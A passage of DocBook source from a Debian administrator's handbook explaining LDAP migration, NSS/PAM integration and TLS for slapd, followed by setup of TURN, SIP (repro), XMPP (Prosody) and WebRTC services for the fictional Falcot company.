+<computeroutput># </computeroutput><userinput>LDAPADD="/usr/bin/ldapadd -c" ETC_ALIASES=/dev/null ./migrate_all_online.sh</userinput></screen>
+			 <para>
+				The <command>migrate_all_online.sh</command> asks a few questions about the LDAP database into which the data is to be migrated. <xref linkend="tab-migrate-all" xrefstyle="select: label       nopage" /> summarizes the answers given in the Falcot use-case.
+			</para>
+			 <table colsep="1" id="tab-migrate-all">
+				<title>Answers to questions asked by the <command>migrate_all_online.sh</command> script</title>
+				 <tgroup cols="2">
+					<colspec align="justify"></colspec>
+					<colspec align="justify"></colspec>
+					 <thead>
+						<row>
+							<entry>Question</entry>
+							<entry>Answer</entry>
+						</row>
+
+					</thead>
+					 <tbody>
+						<row>
+							<entry>X.500 naming context</entry>
+							 <entry><literal>dc=falcot,dc=com</literal></entry>
+
+						</row>
+						 <row>
+							<entry>LDAP server hostname</entry>
+							 <entry><literal>localhost</literal></entry>
+
+						</row>
+						 <row>
+							<entry>Manager DN</entry>
+							 <entry><literal>cn=admin,dc=falcot,dc=com</literal></entry>
+
+						</row>
+						 <row>
+							<entry>Bind credentials</entry>
+							 <entry>the administrative password</entry>
+
+						</row>
+						 <row>
+							<entry>Create DUAConfigProfile</entry>
+							 <entry>no</entry>
+
+						</row>
+
+					</tbody>
+
+				</tgroup>
+
+			</table>
+			 <para>
+				We deliberately ignore migration of the <filename>/etc/aliases</filename> file, since the standard schema as provided by Debian does not include the structures that this script uses to describe email aliases. Should we want to integrate this data into the directory, the <filename>/etc/ldap/schema/misc.schema</filename> file should be added to the standard schema.
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Browsing an LDAP directory</title>
+			 <para>
+				The <command>jxplorer</command> command (in the package of the same name) is a graphical tool allowing to browse and edit an LDAP database. It is an interesting tool that provides an administrator with a good overview of the hierarchical structure of the LDAP data.
+			</para>
+			 <indexterm>
+				<primary><command>jxplorer</command></primary>
+			</indexterm>
+			 </sidebar> <para>
+				Also note the use of the <literal>-c</literal> option to the <command>ldapadd</command> command; this option requests that processing doesn't stop in case of error. Using this option is required because converting the <filename>/etc/services</filename> often generates a few errors that can safely be ignored.
+			</para>
+
+		</section>
+		 <section>
+			<title>Managing Accounts with LDAP</title>
+			 <para>
+				Now the LDAP database contains some useful information, the time has come to make use of this data. This section focuses on how to configure a Linux system so that the various system directories use the LDAP database.
+			</para>
+			 <section id="sect.config-nss">
+				<title>Configuring NSS</title>
+				 <para>
+					The NSS system (Name Service Switch, see sidebar <xref linkend="sidebar.intro-nss" />) is a modular system designed to define or fetch information for system directories. Using LDAP as a source of data for NSS requires installing the <emphasis role="pkg">libnss-ldap</emphasis> package. Its installation asks a few questions; the answers are summarized in <xref linkend="tab-libnss-ldap" xrefstyle="select: label  nopage" />.
+				</para>
+				 <indexterm>
+					<primary><emphasis>libnss-ldap</emphasis></primary>
+				</indexterm>
+				 <table colsep="1" id="tab-libnss-ldap">
+					<title>Configuring the <emphasis role="pkg">libnss-ldap</emphasis> package</title>
+					 <tgroup cols="2">
+						<colspec align="justify"></colspec>
+						 <colspec align="justify"></colspec>
+						 <thead>
+							<row>
+								<entry>Question</entry>
+								 <entry>Answer</entry>
+
+							</row>
+
+						</thead>
+						 <tbody>
+							<row>
+								<entry>LDAP server Uniform Resource Identifier</entry>
+								 <entry> <literal>ldap://ldap.falcot.com</literal> </entry>
+
+							</row>
+							 <row>
+								<entry>Distinguished name of the search base</entry>
+								 <entry> <literal>dc=falcot,dc=com</literal> </entry>
+
+							</row>
+							 <row>
+								<entry>LDAP version to use</entry>
+								 <entry> <literal>3</literal> </entry>
+
+							</row>
+							 <row>
+								<entry>Does the LDAP database require login?</entry>
+								 <entry>no</entry>
+
+							</row>
+							 <row>
+								<entry>Special LDAP privileges for root</entry>
+								 <entry>yes</entry>
+
+							</row>
+							 <row>
+								<entry>Make the configuration file readable/writeable by its owner only</entry>
+								 <entry>no</entry>
+
+							</row>
+							 <row>
+								<entry>LDAP account for root</entry>
+								 <entry> <literal>cn=admin,dc=falcot,dc=com</literal> </entry>
+
+							</row>
+							 <row>
+								<entry>LDAP root account password</entry>
+								 <entry>the administrative password</entry>
+
+							</row>
+
+						</tbody>
+
+					</tgroup>
+
+				</table>
+				 <para>
+					The <filename>/etc/nsswitch.conf</filename> file then needs to be modified, so as to configure NSS to use the freshly-installed <command>ldap</command> module.
+				</para>
+				 <example>
+					<title>The <filename>/etc/nsswitch.conf</filename> file</title>
+					 
+<programlisting>
+# /etc/nsswitch.conf
+#
+# Example configuration of GNU Name Service Switch functionality.
+# If you have the `glibc-doc' and `info' packages installed, try:
+# `info libc "Name Service Switch"' for information about this file.
+
+passwd: ldap compat
+group: ldap compat
+shadow: ldap compat
+
+hosts: files dns ldap
+networks: ldap files
+
+protocols: ldap db files
+services: ldap db files
+ethers: ldap db files
+rpc: ldap db files
+
+netgroup: ldap files
+</programlisting>
+
+				</example>
+				 <para>
+					The <command>ldap</command> module is usually inserted before others, and it will therefore be queried first. The notable exception is the <literal>hosts</literal> service since contacting the LDAP server requires consulting DNS first (to resolve <literal>ldap.falcot.com</literal>). Without this exception, a hostname query would try to ask the LDAP server; this would trigger a name resolution for the LDAP server, and so on in an infinite loop.
+				</para>
+				 <para>
+					If the LDAP server should be considered authoritative (and the local files used by the <command>files</command> module disregarded), services can be configured with the following syntax:
+				</para>
+				 <para>
+					<literal><replaceable>service</replaceable>: ldap [NOTFOUND=return] files</literal>.
+				</para>
+				 <para>
+					If the requested entry does not exist in the LDAP database, the query will return a “not existing” reply even if the resource does exist in one of the local files; these local files will only be used when the LDAP service is down.
+				</para>
+
+			</section>
+			 <section id="sect.config-pam">
+				<title>Configuring PAM</title>
+				 <para>
+					This section describes a PAM configuration (see sidebar <xref linkend="sidebar.intro-pam" />) that will allow applications to perform the required authentications against the LDAP database.
+				</para>
+				 <sidebar> <title><emphasis>CAUTION</emphasis> Broken authentication</title>
+				 <para>
+					Changing the standard PAM configuration used by various programs is a sensitive operation. A mistake can lead to broken authentication, which could prevent logging in. Keeping a root shell open is therefore a good precaution. If configuration errors occur, they can be then fixed and the services restarted with minimal effort.
+				</para>
+				 </sidebar> <para>
+					The LDAP module for PAM is provided by the <emphasis role="pkg">libpam-ldap</emphasis> package. Installing this package asks a few questions very similar to those in <emphasis role="pkg">libnss-ldap</emphasis>; some configuration parameters (such as the URI for the LDAP server) are even actually shared with the <emphasis role="pkg">libnss-ldap</emphasis> package. Answers are summarized in <xref linkend="tab-libpam-ldap" xrefstyle="select: label nopage" />.
+				</para>
+				 <indexterm>
+					<primary><emphasis>libpam-ldap</emphasis></primary>
+				</indexterm>
+				 <table colsep="1" id="tab-libpam-ldap">
+					<title>Configuration of <emphasis>libpam-ldap</emphasis></title>
+					 <tgroup cols="2">
+						<colspec align="justify"></colspec>
+						 <colspec align="justify"></colspec>
+						 <thead>
+							<row>
+								<entry>Question</entry>
+								 <entry>Answer</entry>
+
+							</row>
+
+						</thead>
+						 <tbody>
+							<row>
+								<entry>Allow LDAP admin account to behave like local root?</entry>
+								 <entry>Yes. This allows using the usual <command>passwd</command> command for changing passwords stored in the LDAP database.</entry>
+
+							</row>
+							 <row>
+								<entry>Does the LDAP database require logging in?</entry>
+								 <entry>no</entry>
+
+							</row>
+							 <row>
+								<entry>LDAP account for root</entry>
+								 <entry> <literal>cn=admin,dc=falcot,dc=com</literal> </entry>
+
+							</row>
+							 <row>
+								<entry>LDAP root account password</entry>
+								 <entry>the LDAP database administrative password</entry>
+
+							</row>
+							 <row>
+								<entry>Local encryption algorithm to use for passwords</entry>
+								 <entry>crypt</entry>
+
+							</row>
+
+						</tbody>
+
+					</tgroup>
+
+				</table>
+				 <para>
+					Installing <emphasis role="pkg">libpam-ldap</emphasis> automatically adapts the default PAM configuration defined in the <filename>/etc/pam.d/common-auth</filename>, <filename>/etc/pam.d/common-password</filename> and <filename>/etc/pam.d/common-account</filename> files. This mechanism uses the dedicated <command>pam-auth-update</command> tool (provided by the <emphasis role="pkg">libpam-runtime</emphasis> package). This tool can also be run by the administrator should they wish to enable or disable PAM modules.
+				</para>
+				 <indexterm>
+					<primary><filename>common-auth</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>/etc/pam.d/common-auth</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>common-password</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>/etc/pam.d/common-password</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>common-account</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>/etc/pam.d/common-account</filename></primary>
+				</indexterm>
+
+			</section>
+			 <section>
+				<title>Securing LDAP Data Exchanges</title>
+				 <indexterm>
+					<primary>LDAP</primary>
+					<secondary>secure</secondary>
+				</indexterm>
+				 <para>
+					By default, the LDAP protocol transits on the network as cleartext; this includes the (encrypted) passwords. Since the encrypted passwords can be extracted from the network, they can be vulnerable to dictionary-type attacks. This can be avoided by using an extra encryption layer; enabling this layer is the topic of this section.
+				</para>
+				 <section>
+					<title>Configuring the Server</title>
+					 <indexterm>
+						<primary><foreignphrase>OpenSSL</foreignphrase></primary>
+						<secondary>creating keys</secondary>
+					</indexterm>
+					 <indexterm>
+						<primary>key pair</primary>
+					</indexterm>
+					 <para>
+						The first step is to create a key pair (comprising a public key and a private key) for the LDAP server. The Falcot administrators reuse <emphasis>easy-rsa</emphasis> to generate it (see <xref linkend="sect.easy-rsa" />). Running <command>./build-key-server ldap.falcot.com</command> asks a few mundane questions (location, organization name and so on). The answer to the “common name” question <emphasis>must</emphasis> be the fully-qualified hostname for the LDAP server; in our case, <literal>ldap.falcot.com</literal>.
+					</para>
+					 <para>
+						This command creates a certificate in the <filename>keys/ldap.falcot.com.crt</filename> file; the corresponding private key is stored in <filename>keys/ldap.falcot.com.key</filename>.
+					</para>
+					 <para>
+						Now these keys have to be installed in their standard location, and we must make sure that the private file is readable by the LDAP server which runs under the <literal>openldap</literal> user identity:
+					</para>
+					 
+<screen><computeroutput># </computeroutput><userinput>adduser openldap ssl-cert
+</userinput><computeroutput>Adding user `openldap' to group `ssl-cert' ...
+Adding user openldap to group ssl-cert
+Done.
+# </computeroutput><userinput>mv keys/ldap.falcot.com.key /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>chown root:ssl-cert /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>chmod 0640 /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>mv newcert.pem /etc/ssl/certs/ldap.falcot.com.pem
+</userinput></screen>
+					 <para>
+						The <command>slapd</command> daemon also needs to be told to use these keys for encryption. The LDAP server configuration is managed dynamically: the configuration can be updated with normal LDAP operations on the <literal>cn=config</literal> object hierarchy, and the server updates <filename>/etc/ldap/slapd.d</filename> in real time to make the configuration persistent. <command>ldapmodify</command> is thus the right tool to update the configuration:
+					</para>
+					 <example>
+						<title>Configuring <command>slapd</command> for encryption</title>
+						 
+<screen><computeroutput># </computeroutput><userinput>cat &gt;ssl.ldif &lt;&lt;END
+dn: cn=config
+changetype: modify
+add: olcTLSCertificateFile
+olcTLSCertificateFile: /etc/ssl/certs/ldap.falcot.com.pem
+-
+add: olcTLSCertificateKeyFile
+olcTLSCertificateKeyFile: /etc/ssl/private/ldap.falcot.com.key
+-
+END
+</userinput><computeroutput># </computeroutput><userinput>ldapmodify -Y EXTERNAL -H ldapi:/// -f ssl.ldif
+</userinput><computeroutput>SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "cn=config"
+</computeroutput></screen>
+
+					</example>
+					 <sidebar> <title><emphasis>TOOL</emphasis> <command>ldapvi</command> to edit an LDAP directory</title>
+					 <indexterm>
+						<primary><command>ldapvi</command></primary>
+					</indexterm>
+					 <para>
+						With <command>ldapvi</command>, you can display an LDIF output of any part of the LDAP directory, make some changes in the text editor, and let the tool do the corresponding LDAP operations for you.
+					</para>
+					 <para>
+						It is thus a convenient way to update the configuration of the LDAP server, simply by editing the <literal>cn=config</literal> hierarchy.
+					</para>
+					 
+<screen><computeroutput># </computeroutput><userinput>ldapvi -Y EXTERNAL -h ldapi:/// -b cn=config
+</userinput></screen>
+					 </sidebar> <para>
+						The last step for enabling encryption involves changing the <varname>SLAPD_SERVICES</varname> variable in the <filename>/etc/default/slapd</filename> file. We'll play it safe and disable unsecured LDAP altogether.
+					</para>
+					 <example>
+						<title>The <filename>/etc/default/slapd</filename> file</title>
+						 
+<programlisting>
+# Default location of the slapd.conf file or slapd.d cn=config directory. If
+# empty, use the compiled-in default (/etc/ldap/slapd.d with a fallback to
+# /etc/ldap/slapd.conf).
+SLAPD_CONF=
+
+# System account to run the slapd server under. If empty the server
+# will run as root.
+SLAPD_USER="openldap"
+
+# System group to run the slapd server under. If empty the server will
+# run in the primary group of its user.
+SLAPD_GROUP="openldap"
+
+# Path to the pid file of the slapd server. If not set the init.d script
+# will try to figure it out from $SLAPD_CONF (/etc/ldap/slapd.conf by
+# default)
+SLAPD_PIDFILE=
+
+# slapd normally serves ldap only on all TCP-ports 389. slapd can also
+# service requests on TCP-port 636 (ldaps) and requests via unix
+# sockets.
+# Example usage:
+# SLAPD_SERVICES="ldap://127.0.0.1:389/ ldaps:/// ldapi:///"
+SLAPD_SERVICES="ldaps:/// ldapi:///"
+
+# If SLAPD_NO_START is set, the init script will not start or restart
+# slapd (but stop will still work).  Uncomment this if you are
+# starting slapd via some other means or if you don't want slapd normally
+# started at boot.
+#SLAPD_NO_START=1
+
+# If SLAPD_SENTINEL_FILE is set to path to a file and that file exists,
+# the init script will not start or restart slapd (but stop will still
+# work).  Use this for temporarily disabling startup of slapd (when doing
+# maintenance, for example, or through a configuration management system)
+# when you don't want to edit a configuration file.
+SLAPD_SENTINEL_FILE=/etc/ldap/noslapd
+
+# For Kerberos authentication (via SASL), slapd by default uses the system
+# keytab file (/etc/krb5.keytab).  To use a different keytab file,
+# uncomment this line and change the path.
+#export KRB5_KTNAME=/etc/krb5.keytab
+
+# Additional options to pass to slapd
+SLAPD_OPTIONS=""
+</programlisting>
+
+					</example>
+
+				</section>
+				 <section>
+					<title>Configuring the Client</title>
+					 <para>
+						On the client side, the configuration for the <emphasis>libpam-ldap</emphasis> and <emphasis>libnss-ldap</emphasis> modules needs to be modified to use an <literal>ldaps://</literal> URI.
+					</para>
+					 <para>
+						LDAP clients also need to be able to authenticate the server. In a X.509 public key infrastructure, public certificates are signed by the key of a certificate authority (CA). With <emphasis>easy-rsa</emphasis>, the Falcot administrators have created their own CA and they now need to configure the system to trust the signatures of Falcot's CA. This can be done by putting the CA certificate in <filename>/usr/local/share/ca-certificates</filename> and running <command>update-ca-certificates</command>.
+					</para>
+					 
+<screen><computeroutput># </computeroutput><userinput>cp keys/ca.crt /usr/local/share/ca-certificates/falcot.crt
+</userinput><computeroutput># </computeroutput><userinput>update-ca-certificates
+</userinput><computeroutput>Updating certificates in /etc/ssl/certs... 1 added, 0 removed; done.
+Running hooks in /etc/ca-certificates/update.d....
+Adding debian:falcot.pem
+done.
+done.
+</computeroutput></screen>
+					 <para>
+						Last but not least, the default LDAP URI and default base DN used by the various command line tools can be modified in <filename>/etc/ldap/ldap.conf</filename>. This will save quite some typing.
+					</para>
+					 <example>
+						<title>The <filename>/etc/ldap/ldap.conf</filename> file</title>
+						 
+<programlisting>#
+# LDAP Defaults
+#
+
+# See ldap.conf(5) for details
+# This file should be world readable but not world writable.
+
+BASE   dc=falcot,dc=com
+URI    ldaps://ldap.falcot.com
+
+#SIZELIMIT      12
+#TIMELIMIT      15
+#DEREF          never
+
+# TLS certificates (needed for GnuTLS)
+TLS_CACERT      /etc/ssl/certs/ca-certificates.crt
+</programlisting>
+
+					</example>
+
+				</section>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.rtc-services">
+		<title>Real-Time Communication Services</title>
+		 <para>
+			Real-Time Communication (RTC) services include voice, video/webcam, instant messaging (IM) and desktop sharing. This chapter gives a brief introduction to three of the services required to operate RTC, including a TURN server, SIP server and XMPP server. Comprehensive details of how to plan, install and manage these services are available in the Real-Time Communications Quick Start Guide which includes examples specific to Debian. <ulink type="block" url="http://rtcquickstart.org" />
+		</para>
+		 <indexterm>
+			<primary>VoIP</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>RTC</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>Instant Messaging</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>Chat</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <para>
+			Both SIP and XMPP can provide the same functionality. SIP is slightly more well known for voice and video while XMPP is traditionally regarded as an IM protocol. In fact, they can both be used for any of these purposes. To maximize connectivity options, it is recommended to run both in parallel.
+		</para>
+		 <indexterm>
+			<primary>SIP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>XMPP</primary>
+		</indexterm>
+		 <para>
+			These services rely on X.509 certificates both for authentication and confidentiality purposes. See <xref linkend="sect.easy-rsa" /> for details on how to create them. Alternatively the <emphasis>Real-Time Communications Quick Start Guide</emphasis> also has some useful explanations: <ulink type="block" url="http://rtcquickstart.org/guide/multi/tls.html" />
+		</para>
+		 <section id="sect.rtc-dns-settings">
+			<title>DNS settings for RTC services</title>
+			 <para>
+				RTC services require DNS SRV and NAPTR records. A sample configuration that can be placed in the zone file for <literal>falcot.com</literal>:
+			</para>
+			 <indexterm>
+				<primary>DNS</primary>
+				<secondary>SRV record</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>DNS</primary>
+				<secondary>NAPTR record</secondary>
+			</indexterm>
+			 
+<programlisting>
+; the server where everything will run
+server1            IN     A      198.51.100.19
+server1            IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 only for TURN for now, some clients are buggy with IPv6
+turn-server        IN     A      198.51.100.19
+
+; IPv4 and IPv6 addresses for SIP
+sip-proxy          IN     A      198.51.100.19
+sip-proxy          IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 and IPv6 addresses for XMPP
+xmpp-gw            IN     A      198.51.100.19
+xmpp-gw            IN     AAAA   2001:DB8:1000:2000::19
+
+; DNS SRV and NAPTR for STUN / TURN
+_stun._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+_turn._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+@           IN NAPTR  10 0 "s" "RELAY:turn.udp" "" _turn._udp.falcot.com.
+
+; DNS SRV and NAPTR records for SIP
+_sips._tcp  IN SRV    0 1 5061 sip-proxy.falcot.com.
+@           IN NAPTR  10 0 "s" "SIPS+D2T" "" _sips._tcp.falcot.com.
+
+; DNS SRV records for XMPP Server and Client modes:
+_xmpp-client._tcp  IN     SRV    5 0 5222 xmpp-gw.falcot.com.
+_xmpp-server._tcp  IN     SRV    5 0 5269 xmpp-gw.falcot.com.
+</programlisting>
+
+		</section>
+		 <section id="sect.turn-server">
+			<title>TURN Server</title>
+			 <para>
+				TURN is a service that helps clients behind NAT routers and firewalls to discover the most efficient way to communicate with other clients and to relay the media streams if no direct media path can be found. It is highly recommended that the TURN server is installed before any of the other RTC services are offered to end users.
+			</para>
+			 <indexterm>
+				<primary>TURN</primary>
+				<secondary>server</secondary>
+			</indexterm>
+			 <para>
+				TURN and the related ICE protocol are open standards. To benefit from these protocols, maximizing connectivity and minimizing user frustration, it is important to ensure that all client software supports ICE and TURN.
+			</para>
+			 <indexterm>
+				<primary>ICE</primary>
+			</indexterm>
+			 <para>
+				For the ICE algorithm to work effectively, the server must have two public IPv4 addresses.
+			</para>
+			 <section id="sect.turn-server-install">
+				<title>Install the TURN server</title>
+				 <para>
+					Install the <emphasis role="pkg">resiprocate-turn-server</emphasis> package.
+				</para>
+				 <para>
+					Edit the <filename>/etc/reTurn/reTurnServer.config</filename> configuration file. The most important thing to do is insert the IP addresses of the server.
+				</para>
+				 
+<programlisting>
+# your IP addresses go here:
+TurnAddress = 198.51.100.19
+TurnV6Address = 2001:DB8:1000:2000::19
+AltStunAddress = 198.51.100.20
+# your domain goes here, it must match the value used
+# to hash your passwords if they are already hashed
+# using the HA1 algorithm:
+AuthenticationRealm = myrealm
+
+UserDatabaseFile = /etc/reTurn/users.txt
+UserDatabaseHashedPasswords = true
+</programlisting>
+				 <para>
+					Restart the service.
+				</para>
+
+			</section>
+			 <section id="sect.turn-server-management">
+				<title>Managing the TURN users</title>
+				 <para>
+					Use the htdigest utility to manage the TURN server user list.
+				</para>
+				
+<screen><computeroutput># </computeroutput><userinput>htdigest /etc/reTurn/users.txt myrealm joe</userinput></screen>
+				 <para>
+					Use the HUP signal to make the server reload the <filename>/etc/reTurn/users.txt</filename> file after changing it or enable the automatic reload feature in <filename>/etc/reTurn/reTurnServer.config</filename>.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.sip-server">
+			<title>SIP Proxy Server</title>
+			 <para>
+				A SIP proxy server manages the incoming and outgoing SIP connections between other organizations, SIP trunking providers, SIP PBXes such as Asterisk, SIP phones, SIP-based softphones and WebRTC applications.
+			</para>
+			 <indexterm>
+				<primary>SIP</primary>
+				<secondary>server</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>SIP</primary>
+				<secondary>proxy</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>SIP</primary>
+				<secondary>PBX</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>SIP</primary>
+				<secondary>trunk</secondary>
+			</indexterm>
+			 <para>
+				It is strongly recommended to install and configure the SIP proxy before attempting a SIP PBX setup. The SIP proxy normalizes a lot of the traffic reaching the PBX and provides greater connectivity and resilience.
+			</para>
+			 <section id="sect.sip-server-install">
+				<title>Install the SIP proxy</title>
+				 <para>
+					Install the <emphasis role="pkg">repro</emphasis> package. Using the package from <emphasis role="distribution">jessie-backports</emphasis> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</para>
+				 <indexterm>
+					<primary>repro</primary>
+				</indexterm>
+				 <para>
+					Edit the <filename>/etc/repro/repro.config</filename> configuration file. The most important thing to do is insert the IP addresses of the server. The example below demonstrates how to setup both regular SIP and WebSockets/WebRTC, using TLS, IPv4 and IPv6:
+				</para>
+				 
+<programlisting>
+# Transport1 will be for SIP over TLS connections
+# We use port 5061 here but if you have clients connecting from
+# locations with firewalls you could change this to listen on port 443
+Transport1Interface = 198.51.100.19:5061
+Transport1Type = TLS
+Transport1TlsDomain = falcot.com
+Transport1TlsClientVerification = Optional
+Transport1RecordRouteUri = sip:falcot.com;transport=TLS
+Transport1TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport1TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport2 is the IPv6 version of Transport1
+Transport2Interface = 2001:DB8:1000:2000::19:5061
+Transport2Type = TLS
+Transport2TlsDomain = falcot.com
+Transport2TlsClientVerification = Optional
+Transport2RecordRouteUri = sip:falcot.com;transport=TLS
+Transport2TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport2TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport3 will be for SIP over WebSocket (WebRTC) connections
+# We use port 8443 here but you could use 443 instead
+Transport3Interface = 198.51.100.19:8443
+Transport3Type = WSS
+Transport3TlsDomain = falcot.com
+# This would require the browser to send a certificate, but browsers
+# don't currently appear to be able to, so leave it as None:
+Transport3TlsClientVerification = None
+Transport3RecordRouteUri = sip:falcot.com;transport=WSS
+Transport3TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport3TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport4 is the IPv6 version of Transport3
+Transport4Interface = 2001:DB8:1000:2000::19:8443
+Transport4Type = WSS
+Transport4TlsDomain = falcot.com
+Transport4TlsClientVerification = None
+Transport4RecordRouteUri = sip:falcot.com;transport=WSS
+Transport4TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport4TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport5: this could be for TCP connections to an Asterisk server
+# in your internal network.  Don't allow port 5060 through the external
+# firewall.
+Transport5Interface = 198.51.100.19:5060
+Transport5Type = TCP
+Transport5RecordRouteUri = sip:198.51.100.19:5060;transport=TCP
+
+HttpBindAddress = 198.51.100.19, 2001:DB8:1000:2000::19
+HttpAdminUserFile = /etc/repro/users.txt
+
+RecordRouteUri = sip:falcot.com;transport=tls
+ForceRecordRouting = true
+EnumSuffixes = e164.arpa, sip5060.net, e164.org
+DisableOutbound = false
+EnableFlowTokens = true
+EnableCertificateAuthenticator = True
+</programlisting>
+				 <para>
+					Use the <command>htdigest</command> utility to manage the admin password for the web interface. The username must be <emphasis>admin</emphasis> and the realm name must match the value specified in <filename>repro.config</filename>.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>htdigest /etc/repro/users.txt repro admin</userinput></screen>
+				 <para>
+					Restart the service to use the new configuration.
+				</para>
+
+			</section>
+			 <section id="sect.sip-server-management">
+				<title>Managing the SIP proxy</title>
+				 <para>
+					Go to the web interface at <literal>http://sip-proxy.falcot.com:5080</literal> to complete the configuration by adding domains, local users and static routes.
+				</para>
+				 <para>
+					The first step is to add the local domain. The process must be restarted after adding or removing domains from the list.
+				</para>
+				 <para>
+					The proxy knows how to route calls between local users and full SIP address, the routing configuration is only necessary for overriding default behavior, for example, to recognize phone numbers, add a prefix and route them to a SIP provider.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.xmpp-server">
+			<title>XMPP Server</title>
+			 <para>
+				An XMPP server manages connectivity between local XMPP users and XMPP users in other domains on the public Internet.
+			</para>
+			 <indexterm>
+				<primary>XMPP</primary>
+				<secondary>server</secondary>
+			</indexterm>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> XMPP or Jabber?</title>
+			 <indexterm>
+				<primary>Jabber</primary>
+			</indexterm>
+			 <para>
+				XMPP is sometimes referred to as Jabber. In fact, Jabber is a trademark and XMPP is the official name of the standard.
+			</para>
+			 <indexterm>
+				<primary>Jabber</primary>
+			</indexterm>
+			 </sidebar> <para>
+				Prosody is a popular XMPP server that operates reliably on Debian servers.
+			</para>
+			 <indexterm>
+				<primary>Prosody</primary>
+			</indexterm>
+			 <section id="sect.xmpp-server-install">
+				<title>Install the XMPP server</title>
+				 <para>
+					Install the <emphasis role="pkg">prosody</emphasis> package. Using the package from <emphasis role="distribution">jessie-backports</emphasis> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</para>
+				 <indexterm>
+					<primary>Prosody</primary>
+				</indexterm>
+				 <para>
+					Review the <filename>/etc/prosody/prosody.cfg.lua</filename> configuration file. The most important thing to do is insert JIDs of the users who are permitted to manage the server.
+				</para>
+				 
+<programlisting>
+admins = { "joe@falcot.com" }
+</programlisting>
+				 <para>
+					An individual configuration file is also needed for each domain. Copy the sample from <filename>/etc/prosody/conf.avail/example.com.cfg.lua</filename> and use it as a starting point. Here is <literal>falcot.com.cfg.lua</literal>:
+				</para>
+				 
+<programlisting>
+VirtualHost "falcot.com"
+        enabled = true
+        ssl = {
+                key = "/etc/ssl/private/falcot.com-key.pem";
+                certificate = "/etc/ssl/public/falcot.com.pem";
+                }
+</programlisting>
+				 <para>
+					To enable the domain, there must be a symlink from <filename>/etc/prosody/conf.d/</filename>. Create it that way:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>ln -s /etc/prosody/conf.avail/falcot.com.cfg.lua /etc/prosody/conf.d/</userinput></screen>
+				 <para>
+					Restart the service to use the new configuration.
+				</para>
+
+			</section>
+			 <section id="sect.xmpp-server-management">
+				<title>Managing the XMPP server</title>
+				 <para>
+					Some management operations can be performed using the <literal>prosodyctl</literal> command line utility. For example, to add the administrator account specified in <filename>/etc/prosody/prosody.cfg.lua</filename>:
+				</para>
+				
+<programlisting>
+# prosodyctl adduser joe@falcot.com
+</programlisting>
+				 <para>
+					See the <ulink url="http://prosody.im/doc/configure"> Prosody online documentation</ulink> for more details about how to customize the configuration.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.rtc-port-443">
+			<title>Running services on port 443</title>
+			 <para>
+				Some administrators prefer to run all of their RTC services on port 443. This helps users to connect from remote locations such as hotels and airports where other ports may be blocked or Internet traffic is routed through HTTP proxy servers.
+			</para>
+			 <para>
+				To use this strategy, each service (SIP, XMPP and TURN) needs a different IP address. All the services can still be on the same host as Linux supports multiple IP addresses on a single host. The port number, 443, must be specified in the configuration files for each process and also in the DNS SRV records.
+			</para>
+
+		</section>
+		 <section id="sect.rtc-webrtc">
+			<title>Adding WebRTC</title>
+			 <para>
+				Falcot wants to let customers make phone calls directly from the web site. The Falcot administrators also want to use WebRTC as part of their disaster recovery plan, so staff can use web browsers at home to log in to the company phone system and work normally in an emergency.
+			</para>
+			 <indexterm>
+				<primary>WebRTC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>SIP</primary>
+				<secondary>WebSockets</secondary>
+			</indexterm>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Try WebRTC</title>
+			 <indexterm>
+				<primary>WebRTC</primary>
+				<secondary>demonstration</secondary>
+			</indexterm>
+			 <para>
+				If you have not tried WebRTC before, there are various sites that give an online demonstration and test facilities. <ulink type="block" url="http://www.sip5060.net/test-calls" />
+			</para>
+			 </sidebar> <para>
+				WebRTC is a rapidly evolving technology and it is essential to use packages from the <emphasis role="distribution">jessie-backports</emphasis> or <emphasis role="distribution">Testing</emphasis> distributions.
+			</para>
+			 <para>
